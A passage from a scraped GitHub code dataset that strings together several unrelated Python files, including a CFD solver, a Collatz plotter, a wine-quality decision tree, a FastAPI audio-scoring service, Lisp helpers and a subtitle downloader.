1]\n\n if right.type == \"D\":\n space.p[1, -1] = right.value\n elif right.type == \"N\":\n space.p[:, -1] = right.value * space.dx + space.p[:, -2]\n\n if top.type == \"D\":\n space.p[-1, :] = top.value\n elif top.type == \"N\":\n space.p[-1, :] = -top.value * space.dy + space.p[-2, :]\n\n if bottom.type == \"D\":\n space.p[0, :] = bottom.value\n elif bottom.type == \"N\":\n space.p[0, :] = bottom.value * space.dy + space.p[1, :]\n\n\ndef SetTimeStep(CFL, space, fluid):\n with np.errstate(divide=\"ignore\"):\n dt = CFL / np.sum([np.amax(space.u) / space.dx, np.amax(space.v) / space.dy])\n # Escape condition if dt is infinity due to zero velocity initially\n if np.isinf(dt):\n dt = CFL * (space.dx + space.dy)\n space.dt = dt\n\n\n# The first function is used to get starred velocities from u and v at timestep t\ndef GetStarredVelocities(space, fluid):\n # Save object attributes as local variable with explicity typing for improved readability\n rows = int(space.rowpts)\n cols = int(space.colpts)\n u = space.u.astype(float, copy=False)\n v = space.v.astype(float, copy=False)\n dx = float(space.dx)\n dy = float(space.dy)\n dt = float(space.dt)\n S_x = float(space.S_x)\n S_y = float(space.S_y)\n rho = float(fluid.rho)\n mu = float(fluid.mu)\n\n # Copy u and v to new variables u_star and v_star\n u_star = u.copy()\n v_star = v.copy()\n\n # Calculate derivatives of u and v using the finite difference scheme.\n # Numpy vectorization saves us from using slower for loops to go over each element in the u and v matrices\n u1_y = (u[2:, 1 : cols + 1] - u[0:rows, 1 : cols + 1]) / (2 * dy)\n u1_x = (u[1 : rows + 1, 2:] - u[1 : rows + 1, 0:cols]) / (2 * dx)\n u2_y = (\n u[2:, 1 : cols + 1]\n - 2 * u[1 : rows + 1, 1 : cols + 1]\n + u[0:rows, 1 : cols + 1]\n ) / (dy**2)\n u2_x = (\n u[1 : rows + 1, 2:]\n - 2 * u[1 : rows + 1, 1 : cols + 1]\n + u[1 : rows + 1, 0:cols]\n ) / (dx**2)\n v_face = (\n v[1 : rows + 1, 1 : cols + 1]\n + v[1 : rows + 1, 0:cols]\n + v[2:, 1 : cols + 1]\n + v[2:, 0:cols]\n ) / 4\n u_star[1 : rows + 1, 1 : cols + 1] = (\n u[1 : rows + 1, 1 : cols + 1]\n - dt * (u[1 : rows + 1, 1 : cols + 1] * u1_x + v_face * u1_y)\n + (dt * (mu / rho) * (u2_x + u2_y))\n + (dt * S_x)\n )\n\n v1_y = (v[2:, 1 : cols + 1] - v[0:rows, 1 : cols + 1]) / (2 * dy)\n v1_x = (v[1 : rows + 1, 2:] - v[1 : rows + 1, 0:cols]) / (2 * dx)\n v2_y = (\n v[2:, 1 : cols + 1]\n - 2 * v[1 : rows + 1, 1 : cols + 1]\n + v[0:rows, 1 : cols + 1]\n ) / (dy**2)\n v2_x = (\n v[1 : rows + 1, 2:]\n - 2 * v[1 : rows + 1, 1 : cols + 1]\n + v[1 : rows + 1, 0:cols]\n ) / (dx**2)\n u_face = (\n u[1 : rows + 1, 1 : cols + 1]\n + u[1 : rows + 1, 2:]\n + u[0:rows, 1 : cols + 1]\n + u[0:rows, 2:]\n ) / 4\n v_star[1 : rows + 1, 1 : cols + 1] = (\n v[1 : rows + 1, 1 : cols + 1]\n - dt * (u_face * v1_x + v[1 : rows + 1, 1 : cols + 1] * v1_y)\n + (dt * (mu / rho) * (v2_x + v2_y))\n + (dt * S_y)\n )\n\n # Save the calculated starred velocities to the space object\n space.u_star = u_star.copy()\n space.v_star = v_star.copy()\n\n\n# The second function is used to iteratively solve the pressure Possion equation from the starred velocities\n# to calculate pressure at t+delta_t\ndef SolvePressurePoisson(space, fluid, left, right, top, bottom):\n # Save object attributes as local variable with explicity typing for improved readability\n rows = int(space.rowpts)\n cols = int(space.colpts)\n u_star = space.u_star.astype(float, copy=False)\n v_star = space.v_star.astype(float, copy=False)\n p = space.p.astype(float, copy=False)\n dx = float(space.dx)\n dy = float(space.dy)\n dt = float(space.dt)\n rho = float(fluid.rho)\n factor = 1 / (2 / dx**2 + 2 / dy**2)\n\n # Define initial error and tolerance for convergence (error > tol necessary initially)\n error = 1\n tol = 1e-3\n\n # Evaluate derivative of starred velocities\n ustar1_x = (u_star[1 : rows + 1, 2:] - u_star[1 : rows + 1, 0:cols]) / (2 * dx)\n vstar1_y = (v_star[2:, 1 : cols + 1] - v_star[0:rows, 1 : cols + 1]) / (2 * dy)\n\n # Continue iterative solution until error becomes smaller than tolerance\n i = 0\n while error > tol:\n i += 1\n\n # Save current pressure as p_old\n p_old = p.astype(float, copy=True)\n\n # Evaluate second derivative of pressure from p_old\n p2_xy = (p_old[2:, 1 : cols + 1] + p_old[0:rows, 1 : cols + 1]) / dy**2 + (\n p_old[1 : rows + 1, 2:] + p_old[1 : rows + 1, 0:cols]\n ) / dx**2\n\n # Calculate new pressure\n p[1 : rows + 1, 1 : cols + 1] = (p2_xy) * factor - (rho * factor / dt) * (\n ustar1_x + vstar1_y\n )\n\n # Find maximum error between old and new pressure matrices\n error = np.amax(abs(p - p_old))\n\n # Apply pressure boundary conditions\n SetPBoundary(space, left, right, top, bottom)\n\n # Escape condition in case solution does not converge after 500 iterations\n if i > 500:\n tol *= 10\n\n\n# The third function is used to calculate the velocities at timestep t+delta_t using the pressure at t+delta_t and starred velocities\ndef SolveMomentumEquation(space, fluid):\n # Save object attributes as local variable with explicity typing for improved readability\n rows = int(space.rowpts)\n cols = int(space.colpts)\n u_star = space.u_star.astype(float, copy=False)\n v_star = space.v_star.astype(float, copy=False)\n p = space.p.astype(float, copy=False)\n dx = float(space.dx)\n dy = float(space.dy)\n dt = float(space.dt)\n rho = float(fluid.rho)\n u = space.u.astype(float, copy=False)\n v = space.v.astype(float, copy=False)\n\n # Evaluate first derivative of pressure in x direction\n p1_x = (p[1 : rows + 1, 2:] - p[1 : rows + 1, 0:cols]) / (2 * dx)\n # Calculate u at next timestep\n u[1 : rows + 1, 1 : cols + 1] = (\n u_star[1 : rows + 1, 1 : cols + 1] - (dt / rho) * p1_x\n )\n\n # Evaluate first derivative of pressure in y direction\n p1_y = (p[2:, 1 : cols + 1] - p[0:rows, 1 : cols + 1]) / (2 * dy)\n # Calculate v at next timestep\n v[1 : rows + 1, 1 : cols + 1] = (\n v_star[1 : rows + 1, 1 : cols + 1] - (dt / rho) * p1_y\n )\n\n\ndef SetCentrePUV(space):\n space.p_c = space.p[1:-1, 1:-1]\n space.u_c = space.u[1:-1, 1:-1]\n space.v_c = space.v[1:-1, 1:-1]\n\n\ndef MakeResultDirectory(wipe=False):\n # Get path to the Result directory\n cwdir = os.getcwd()\n dir_path = os.path.join(cwdir, \"results\")\n # If directory does not exist, make it\n if not os.path.isdir(dir_path):\n os.makedirs(dir_path, exist_ok=True)\n else:\n # If wipe is True, remove files present in the directory\n if wipe:\n os.chdir(dir_path)\n filelist = os.listdir()\n for file in filelist:\n os.remove(file)\n\n os.chdir(cwdir)\n\n\ndef WriteToFile(space, iteration, interval):\n if iteration % interval == 0:\n dir_path = os.path.join(os.getcwd(), \"results\")\n filename = \"PUV{0}.txt\".format(iteration)\n path = os.path.join(dir_path, filename)\n with open(path, \"w\") as f:\n for i in range(space.rowpts):\n for j in range(space.colpts):\n f.write(\n \"{}\\t{}\\t{}\\n\".format(\n space.p_c[i, j], space.u_c[i, j], space.v_c[i, j]\n )\n )\n","repo_name":"lrizza/CFD","sub_path":"bin/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"39352237357","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 29 15:33:25 2017\n\n@author: lucfrachon\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef collatz(num):\n \n \n if num % 2 == 0:\n num /= 2\n else:\n num *= 3\n num += 1\n return num\n \n \ndef run_collatz(start):\n numbers = [start]\n num = start\n it = 0\n \n while num > 1:\n num = collatz(num)\n numbers.append(num)\n it += 1\n return numbers\n\nif __name__ == '__main__': \n\n highest_number = int(input('Highest number to sample from: '))\n num_sample = int(input('How many numbers do you want to try? '))\n sample = np.random.randint(1, highest_number, size = num_sample) \n lines = []\n\n for num in sample:\n print(\"Trying \", num)\n numbers = run_collatz(num)\n plt.plot(numbers, label = str(num), alpha = .3)\n plt.yscale('log')\n plt.title(\"Collatz Conjecture\")\n plt.legend(loc = 'upper right', fontsize = 'xx-small')\n \n\n \n \n","repo_name":"LucFrachon/collatz-conjecture","sub_path":"collatz_conjecture.py","file_name":"collatz_conjecture.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72404319842","text":"import random\r\nfrom random import randrange\r\nimport csv\r\nimport math\r\nalldata=[]\r\ncsv_reader = csv.reader(open('D:/csc/proj/train.csv'))\r\nfor line in csv_reader:\r\n alldata.append(line)#read the file 读取文件\r\n\r\ndef findmax(datain,parameter):# find the biggest parameter in a certain parameter\r\n previous = float(datain[0][parameter])\r\n max=previous\r\n for data in range(1,len(datain)-1):\r\n if float(datain[data][parameter])> max:\r\n max = float(datain[data][parameter])\r\n return max\r\n\r\ndef findmin(datain,parameter):# find the smallest parameter in a certain parameter\r\n previous = float(datain[0][parameter])\r\n min=previous\r\n for data in range(1,len(datain)-1):\r\n if float(datain[data][parameter])< min:\r\n min = float(datain[data][parameter])\r\n return min\r\n\r\ndef checkentropy(data0,step,parameter):#find the best dicision for a certain parameter 定义函数 父辈数据 模拟次数 下限 上限 判断参量\r\n data1=data0#父辈数据\r\n data2=[]\r\n data3=[]\r\n bigger=0\r\n smaller=0\r\n number = 0 \r\n test = findmin(data0,parameter) + step# start from the smallest one\r\n for data in range(len(data1)-1):#for classcification\r\n if eval(data1[data][parameter]) >test:#父辈相应维度参数是否大于或小于边界值\r\n data2.append(data1[data])#如果大了,把这个数据加到data2集合# bigger data\r\n else:\r\n data3.append(data1[data])#如果小了,把这个数据加到data3集合 \r\n for score in range(len(data2)-1):#算第一个子类的熵# smaller data\r\n if eval(data2[score][11]) > 6:\r\n bigger += 1\r\n else:\r\n smaller +=1\r\n gini1 = 1- ((((bigger/len(data2))**2) +((smaller/len(data2))**2)))# calculate ginic 1\r\n bigger=0\r\n smaller=0\r\n for score in range(len(data3)-1):#算第二个子类\r\n if eval(data3[score][11]) > 6:\r\n bigger += 1\r\n else:\r\n smaller +=1\r\n gini2 = 1- ((((bigger/len(data3))**2) +((smaller/len(data3))**2)))#得到第二个熵# gini 2 \r\n totalgini = (gini1 + gini2)/2#子类总熵# total gini\r\n previousgini= totalgini\r\n smallestgini = totalgini# store data for a while\r\n output = test\r\n while True:\r\n if test < findmax(data0,parameter):# count the test numbe for all\r\n number += 1\r\n else:\r\n break\r\n test+= step\r\n test = findmin(data0,parameter) + step\r\n for time in range(number): # calculate every test\r\n data2=[]\r\n data3=[]\r\n bigger=0\r\n smaller=0\r\n for data in range(len(data1)-1):\r\n if eval(data1[data][parameter]) >test:#父辈相应维度参数是否大于或小于边界值\r\n data2.append(data1[data])#如果大了,把这个数据加到data2集合\r\n else:\r\n data3.append(data1[data])#如果小了,把这个数据加到data3集合\r\n \r\n for score in range(len(data2)-1):#算第一个子类的熵\r\n if eval(data2[score][11]) > 6:\r\n bigger += 1\r\n else:\r\n smaller +=1\r\n gini1 = 1- ((((bigger/len(data2))**2) +((smaller/len(data2))**2)))#得到第一个熵\r\n bigger=0\r\n smaller=0\r\n for score in range(len(data3)-1):#算第二个子类\r\n if eval(data3[score][11]) > 6:\r\n bigger += 1\r\n else:\r\n smaller +=1\r\n gini2 = 1- ((((bigger/len(data3))**2) +((smaller/len(data3))**2)))#得到第二个熵\r\n totalgini = (gini1 + gini2)/2#子类总熵\r\n currentgini = totalgini\r\n \r\n if currentgini < previousgini:#大小比对# find the test that minimum the gini\r\n output = test\r\n smallestgini= currentgini\r\n previousgini = currentgini\r\n test += step\r\n print(\" \")\r\n print (\"gini is:\",smallestgini)\r\n return output\r\n\r\ndef qualityguess(six):# from here the tree begin\r\n if six > 0.85:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv2_1 = []\r\nlv2_2 = []\r\n\r\nfor data in range(len(alldata)-1):\r\n if qualityguess(float(alldata[data][1]))==2.1:\r\n lv2_1.append(alldata[data])\r\n elif qualityguess(float(alldata[data][1]))==2.2:\r\n lv2_2.append(alldata[data])\r\ncount2_1 = 0\r\ncount2_2 = 0\r\nfor score in range(len(lv2_1)-1):\r\n if float(lv2_1[score][11]) > 6 :\r\n count2_1 += 1\r\n else:\r\n count2_2 += 1 \r\n\r\nprint(count2_1,\"above 6\")\r\nprint(count2_2,\"below 6\")\r\nprint (\"the length of lv2_2\",len(lv2_2))\r\n\r\ndef qualityguess2(six):\r\n if six > 9.19:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv3_1 = []\r\nlv3_2 = []\r\n\r\nfor data in range(len(lv2_2)-1):\r\n if qualityguess2(float(lv2_2[data][10]))==2.1:\r\n lv3_1.append(lv2_2[data])\r\n elif qualityguess2(float(lv2_2[data][10]))==2.2:\r\n lv3_2.append(lv2_2[data])\r\ncount3_1 = 0\r\ncount3_2 = 0\r\nfor score in range(len(lv3_2)-1):\r\n if float(lv3_2[score][11]) > 6 :\r\n count3_1 += 1\r\n else:\r\n count3_2 += 1 \r\n\r\nprint(count3_1,\"above 6\")\r\nprint(count3_2,\"below 6\")\r\nprint (\"the length \",len(lv3_2))\r\n\r\n#print(\"for the parameter\",9,\",the output is\",checkentropy(lv2_2,0.01,9))\r\n\r\ndef qualityguess3(six):\r\n if six > 9.49:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv4_1 = []\r\nlv4_2 = []\r\n\r\nfor data in range(len(lv3_1)-1):\r\n if qualityguess3(float(lv3_1[data][10]))==2.1:\r\n lv4_1.append(lv3_1[data])\r\n elif qualityguess3(float(lv3_1[data][10]))==2.2:\r\n lv4_2.append(lv3_1[data])\r\ncount4_1 = 0\r\ncount4_2 = 0\r\nfor score in range(len(lv4_1)-1):\r\n if float(lv4_1[score][11]) > 6 :\r\n count4_1 += 1\r\n else:\r\n count4_2 += 1 \r\n\r\nprint(count4_1,\"above 6\")\r\nprint(count4_2,\"below 6\")\r\nprint (\"the length \",len(lv4_1))\r\n\r\ndef qualityguess4(six):\r\n if six > 0.54:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv5_1 = []\r\nlv5_2 = []\r\n\r\nfor data in range(len(lv4_1)-1):\r\n if qualityguess4(float(lv4_1[data][9]))==2.1:\r\n lv5_1.append(lv4_1[data])\r\n elif qualityguess4(float(lv4_1[data][9]))==2.2:\r\n lv5_2.append(lv4_1[data])\r\ncount5_1 = 0\r\ncount5_2 = 0\r\nfor score in range(len(lv5_2)-1):\r\n if float(lv5_2[score][11]) > 6 :\r\n count5_1 += 1\r\n else:\r\n count5_2 += 1 \r\n\r\nprint(count5_1,\"above 6\")\r\nprint(count5_2,\"below 6\")\r\nprint (\"the length \",len(lv5_2))\r\n\r\ndef qualityguess5(six):\r\n if six > 106:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv6_1 = []\r\nlv6_2 = []\r\n\r\nfor data in range(len(lv5_1)-1):\r\n if qualityguess5(float(lv5_1[data][6]))==2.1:\r\n lv6_1.append(lv5_1[data])\r\n elif qualityguess5(float(lv5_1[data][6]))==2.2:\r\n lv6_2.append(lv5_1[data])\r\ncount6_1 = 0\r\ncount6_2 = 0\r\nfor score in range(len(lv6_1)-1):\r\n if float(lv6_1[score][11]) > 6 :\r\n count6_1 += 1\r\n else:\r\n count6_2 += 1 \r\n\r\nprint(count6_1,\"above 6\")\r\nprint(count6_2,\"below 6\")\r\nprint (\"the length \",len(lv6_1))\r\n\r\ndef qualityguess6(six):\r\n if six > 0.6:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv7_1 = []\r\nlv7_2 = []\r\n\r\nfor data in range(len(lv6_2)-1):\r\n if qualityguess6(float(lv6_2[data][1]))==2.1:\r\n lv7_1.append(lv6_2[data])\r\n elif qualityguess6(float(lv6_2[data][1]))==2.2:\r\n lv7_2.append(lv6_2[data])\r\ncount7_1 = 0\r\ncount7_2 = 0\r\nfor score in range(len(lv7_1)-1):\r\n if float(lv7_1[score][11]) > 6 :\r\n count7_1 += 1\r\n else:\r\n count7_2 += 1 \r\n\r\nprint(count7_1,\"above 6\")\r\nprint(count7_2,\"below 6\")\r\nprint (\"the length \",len(lv7_1))\r\n\r\ndef qualityguess7(six):\r\n if six > 0.109:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv8_1 = []\r\nlv8_2 = []\r\n\r\nfor data in range(len(lv7_2)-1):\r\n if qualityguess7(float(lv7_2[data][4]))==2.1:\r\n lv8_1.append(lv7_2[data])\r\n elif qualityguess7(float(lv7_2[data][4]))==2.2:\r\n lv8_2.append(lv7_2[data])\r\ncount8_1 = 0\r\ncount8_2 = 0\r\nfor score in range(len(lv8_2)-1):\r\n if float(lv8_2[score][11]) > 6 :\r\n count8_1 += 1\r\n else:\r\n count8_2 += 1 \r\n\r\nprint(count8_1,\"above 6\")\r\nprint(count8_2,\"below 6\")\r\nprint (\"the length \",len(lv8_2))\r\n\r\ndef qualityguess8(six):\r\n if six > 9.7:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv9_1 = []\r\nlv9_2 = []\r\n\r\nfor data in range(len(lv8_2)-1):\r\n if qualityguess8(float(lv8_2[data][10]))==2.1:\r\n lv9_1.append(lv8_2[data])\r\n elif qualityguess8(float(lv8_2[data][10]))==2.2:\r\n lv9_2.append(lv8_2[data])\r\ncount9_1 = 0\r\ncount9_2 = 0\r\nfor score in range(len(lv9_2)-1):\r\n if float(lv9_2[score][11]) > 6 :\r\n count9_1 += 1\r\n else:\r\n count9_2 += 1 \r\n\r\nprint(count9_1,\"above 6\")\r\nprint(count9_2,\"below 6\")\r\nprint (\"the length \",len(lv9_2))\r\n\r\ndef qualityguess9(six):\r\n if six > 56:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv10_1 = []\r\nlv10_2 = []\r\n\r\nfor data in range(len(lv9_1)-1):\r\n if qualityguess9(float(lv9_1[data][6]))==2.1:\r\n lv10_1.append(lv9_1[data])\r\n elif qualityguess9(float(lv9_1[data][6]))==2.2:\r\n lv10_2.append(lv9_1[data])\r\ncount10_1 = 0\r\ncount10_2 = 0\r\nfor score in range(len(lv10_1)-1):\r\n if float(lv10_1[score][11]) > 6 :\r\n count10_1 += 1\r\n else:\r\n count10_2 += 1 \r\n\r\nprint(count10_1,\"above 6\")\r\nprint(count10_2,\"below 6\")\r\nprint (\"the length \",len(lv10_1))\r\n\r\ndef qualityguess10(six):\r\n if six > 0.59:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv11_1 = []\r\nlv11_2 = []\r\n\r\nfor data in range(len(lv10_2)-1):\r\n if qualityguess10(float(lv10_2[data][1]))==2.1:\r\n lv11_1.append(lv10_2[data])\r\n elif qualityguess10(float(lv10_2[data][1]))==2.2:\r\n lv11_2.append(lv10_2[data])\r\ncount11_1 = 0\r\ncount11_2 = 0\r\nfor score in range(len(lv11_1)-1):\r\n if float(lv11_1[score][11]) > 6 :\r\n count11_1 += 1\r\n else:\r\n count11_2 += 1 \r\n\r\nprint(count11_1,\"above 6\")\r\nprint(count11_2,\"below 6\")\r\nprint (\"the length \",len(lv11_1))\r\n\r\ndef qualityguess11(six):\r\n if six > 3.449:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv12_1 = []\r\nlv12_2 = []\r\n\r\nfor data in range(len(lv11_2)-1):\r\n if qualityguess11(float(lv11_2[data][8]))==2.1:\r\n lv12_1.append(lv11_2[data])\r\n elif qualityguess11(float(lv11_2[data][8]))==2.2:\r\n lv12_2.append(lv11_2[data])\r\ncount12_1 = 0\r\ncount12_2 = 0\r\nfor score in range(len(lv12_1)-1):\r\n if float(lv12_1[score][11]) > 6 :\r\n count12_1 += 1\r\n else:\r\n count12_2 += 1 \r\n\r\nprint(count12_1,\"above 6\")\r\nprint(count12_2,\"below 6\")\r\nprint (\"the length \",len(lv12_1))\r\n\r\ndef qualityguess12(six):\r\n if six > 0.9976:\r\n second= 2.1\r\n else:\r\n second= 2.2#一级判断\r\n return second\r\n\r\nlv13_1 = []\r\nlv13_2 = []\r\n\r\nfor data in range(len(lv12_2)-1):\r\n if qualityguess12(float(lv12_2[data][7]))==2.1:\r\n lv13_1.append(lv12_2[data])\r\n elif qualityguess12(float(lv12_2[data][7]))==2.2:\r\n lv13_2.append(lv12_2[data])\r\ncount13_1 = 0\r\ncount13_2 = 0\r\nfor score in range(len(lv13_1)-1):\r\n if float(lv13_1[score][11]) > 6 :\r\n count13_1 += 1\r\n else:\r\n count13_2 += 1 \r\n\r\nprint(count13_1,\"above 6\")\r\nprint(count13_2,\"below 6\")\r\nprint (\"the length \",len(lv13_1))\r\n\r\nprint(\"the output for\",0,\"is\",checkentropy(lv12_2,0.1,0))\r\nprint(\"the output for\",1,\"is\",checkentropy(lv12_2,0.01,1))\r\nprint(\"the output for\",2,\"is\",checkentropy(lv12_2,0.01,2))\r\nprint(\"the output for\",3,\"is\",checkentropy(lv12_2,0.1,3))\r\nprint(\"the output for\",4,\"is\",checkentropy(lv12_2,0.001,4))\r\nprint(\"the output for\",5,\"is\",checkentropy(lv12_2,1,5))\r\nprint(\"the output for\",6,\"is\",checkentropy(lv12_2,1,6))\r\nprint(\"the output for\",7,\"is\",checkentropy(lv12_2,0.00001,7))\r\nprint(\"the output for\",8,\"is\",checkentropy(lv12_2,0.01,8))\r\nprint(\"the output for\",9,\"is\",checkentropy(lv12_2,0.01,9))\r\nprint(\"the output for\",10,\"is\",checkentropy(lv12_2,0.1,10))","repo_name":"GavinZhang-0503/data-classfication-of-wine-quanlity","sub_path":"src/BuidingCART ver2.py","file_name":"BuidingCART ver2.py","file_ext":"py","file_size_in_byte":12203,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"32601332719","text":"from fastapi import FastAPI, File, Form, UploadFile\nfrom starlette.middleware.cors import CORSMiddleware\n\nfrom app.api.routes import api_router\nfrom app.schemas.audio import Evaluation\nfrom app.utils.init_db import init_db\nfrom app.utils.settings import get_settings\nfrom db import db\nimport asyncio\nfrom pydub import AudioSegment\n\nfrom files.parse_files import parse_file\n\nimport tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras.utils import custom_object_scope\nfrom tensorflow.keras.models import load_model\nfrom keras import backend as K\nimport os\nfrom urllib.request import urlopen, urlretrieve\nimport ssl\nfrom app.utils.audio import process_audio\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n\nmodel = None\n\ndef initialize_weights(shape, dtype=None):\n return np.random.normal(loc=0.0, scale=1e-2, size=shape)\n\n\ndef initialize_bias(shape, dtype=None):\n return np.random.normal(loc=0.5, scale=1e-2, size=shape)\n\n \n\nsettings = get_settings()\n\napp = FastAPI(\n title=settings.PROJECT_NAME, openapi_url=f\"{settings.API_V1_STR}/openapi.json\"\n)\n\n# Set all CORS enabled originsss\nif settings.BACKEND_CORS_ORIGINS:\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[str(origin) for origin in settings.BACKEND_CORS_ORIGINS],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n\napp.include_router(api_router)\n\n@app.on_event(\"startup\")\nasync def startup():\n await db.connect()\n await init_db()\n with custom_object_scope(\n {\n \"initialize_weights\": initialize_weights,\n \"initialize_bias\": initialize_bias,\n \"K\": K,\n }\n ):\n global model\n model = load_model(\"model-2.h5\")\n \n\n@app.on_event(\"shutdown\")\nasync def shutdown():\n await db.disconnect()\n\n@app.get(\"/\")\ndef read_root():\n return {\"version\": \"1.0.0\"}\n\n@app.post(\"/audio/evaluate\")\nasync def evaluate_audio(ref_url: str = Form(...), file: UploadFile = File(...)):\n \n\n audio_name = ref_url.split(\"/\")[-1]\n ref_path = f\"files/audio/{audio_name}\"\n urlretrieve(ref_url, ref_path)\n\n test_path = f\"files/audio/{file.filename}\"\n with open(test_path, \"wb\") as f:\n f.write(await file.read())\n\n f.close()\n \n wav_ref = f\"files/audio/audio1.wav\"\n wav_test = f\"files/audio/audio2.wav\"\n \n audio = AudioSegment.from_file(ref_path)\n audio.export(wav_ref, format=\"wav\")\n \n audio1 = AudioSegment.from_file(test_path)\n audio1.export(wav_test, format=\"wav\")\n\n ref_audio = process_audio(wav_ref)\n test_audio = process_audio(wav_test)\n\n os.remove(ref_path)\n os.remove(test_path)\n os.remove(wav_test)\n os.remove(wav_ref)\n\n prediction = model.predict([ref_audio, test_audio])\n prediction_score = prediction[0][0]\n\n if prediction_score <= 0.25:\n return Evaluation(prediction=1)\n elif 0.25 < prediction_score <= 0.5:\n return Evaluation(prediction=2)\n else:\n return Evaluation(prediction=3)\n","repo_name":"RaheemWilson/chatgud-backend","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"18090679171","text":"from tokens import *\n\ndef grab_lisp_statement(stack, keep_parentheses = False, error_message = \"Missing closing parentheses\"):\n\n paren_count = 1\n \n ret_val = list()\n\n if not keep_parentheses:\n stack.pop()\n else:\n ret_val.append(stack.pop())\n \n \n while paren_count > 0:\n assert len(stack) > 0, error_message\n ret_val.append(stack.pop())\n if ret_val[-1][0] == TokenType.LEFT_PARENTHESES:\n paren_count += 1\n elif ret_val[-1][0] == TokenType.RIGHT_PARENTHESES:\n paren_count -= 1\n \n if not keep_parentheses:\n ret_val.pop()\n\n ret_val.reverse()\n\n return ret_val\n\ndef run_lisp_stack(stack, parser):\n from lparser import LispParser\n par = LispParser()\n par.scope.parent = parser.scope\n par.parse_stack(stack)\n return par.scope.stack\n\ndef evaluate_lisp_stack(stack, parser):\n res_stack = run_lisp_stack(stack, parser)\n if len(res_stack) > 0:\n return res_stack.pop()\n else:\n return (TokenType.NIL, None)\n\ndef get_next_stack_value(stack, parser):\n if stack[-1][0] == TokenType.LEFT_PARENTHESES:\n return evaluate_lisp_stack(grab_lisp_statement(stack, keep_parentheses=True), parser)\n else:\n return stack.pop()\n","repo_name":"DaDarkWizard/ModelingTheThinking","sub_path":"DaskersThoughts/lhelpers.py","file_name":"lhelpers.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"23726471143","text":"#!/usr/bin/env python3\n\nimport argparse\nimport locale\nimport os\nimport sys\nfrom downloader import Downloader\nfrom query import Query\nfrom subscene import SubScene\nfrom subclub import SubClub\n\nif __name__ == \"__main__\":\n default_lang = locale.getdefaultlocale()[0][:2]\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"file\", help=\"Name or file to search\")\n parser.add_argument(\"-c\", \"--count\", type=int, default=1, help=\"Maximum number of files to download\")\n parser.add_argument(\"-l\", \"--lang\", default=default_lang, help=\"Language of the subtitles\")\n\n args = parser.parse_args()\n\n name = args.file\n root = os.getcwd()\n\n if os.path.isfile(name):\n root = os.path.dirname(name)\n\n query = Query.parse(os.path.basename(args.file))\n\n if not query:\n print(\"Could not parse the query\")\n sys.exit(1)\n\n print(\"Searching for matches...\", end=\"\", flush=True)\n\n dl = Downloader([\n SubClub(),\n SubScene()\n ])\n results = dl.get(query, args.count, args.lang)\n\n print(\" found %i\" % len(results))\n for file in results:\n print(\"Writing %s\" % file.write(root))\n","repo_name":"LKarel/subdl","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22851223281","text":"from Bio.config.DBRegistry import CGIDB, DBGroup\nfrom _support import *\n\n# This returns HTML-formatted data. Is there a way to get raw text?\ninterpro_ebi_cgi = CGIDB(\n name=\"interpro-ebi-cgi\",\n cgi='http://www.ebi.ac.uk/interpro/IEntry',\n doc=\"Retrieve an InterPro entry\",\n delay=5.0,\n key=\"ac\",\n failure_cases=[(has_str(\"No InterPro entry\"), \"No InterPro entry\")]\n )\n\ninterpro = DBGroup(\n name = \"interpro\",\n behavior = \"serial\"\n )\ninterpro.add(interpro_ebi_cgi)\n","repo_name":"dbmi-pitt/DIKB-Micropublication","sub_path":"scripts/mp-scripts/Bio/dbdefs/interpro.py","file_name":"interpro.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"40943544447","text":"from __future__ import print_function\nimport argparse\nimport os\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.autograd as autograd\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport math\nimport util\nimport classifier\nimport classifier2\nimport sys\nimport model\nimport numpy as np\nimport time\nimport torch.nn.functional as F\nfrom sklearn.cluster import KMeans\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--dataset', default='FLO', help='FLO')\nparser.add_argument('--dataroot', default='/home/poxiaoge/Documents/dataset/ZSL', help='path to dataset')\nparser.add_argument('--matdataset', default=True, help='Data in matlab format')\nparser.add_argument('--image_embedding', 